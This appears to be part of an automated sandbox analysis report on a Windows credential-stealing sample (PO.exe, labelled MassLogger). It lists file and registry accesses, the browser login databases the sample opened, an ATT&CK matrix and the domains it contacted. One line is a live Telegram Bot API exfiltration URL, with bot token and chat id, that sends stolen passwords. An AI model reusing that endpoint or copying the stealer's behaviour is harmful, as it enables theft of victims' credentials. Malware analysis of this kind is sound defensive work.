                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.352e220.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34ed1b0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PO.exe.34c3380.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7740, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Input Capture
                1
                Process Discovery
                Remote Desktop Protocol1
                Input Capture
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares11
                Archive Collected Data
                1
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object Model1
                Data from Local System
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO.exe55%ReversingLabsByteCode-MSIL.Trojan.MassloggerRAT
                PO.exe100%AviraHEUR/AGEN.1306813
                PO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://api.telegram.orgd0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.112.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://api.telegram.org/bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023628633&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bThePO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers?PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgdRegAsm.exe, 00000002.00000002.4146303325.00000000028FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.tiro.comPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.goodfont.co.krPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.carterandcone.comlPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.typography.netDPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.fontbureau.com/designers/cabarga.htmlNPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cThePO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cnPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.comdRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://checkip.dyndns.org/qPO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.jiyu-kobo.co.jp/PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://reallyfreegeoip.orgRegAsm.exe, 00000002.00000002.4146303325.00000000028FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.orgdRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.galapagosdesign.com/DPleasePO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.orgRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.fontbureau.com/designers8PO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
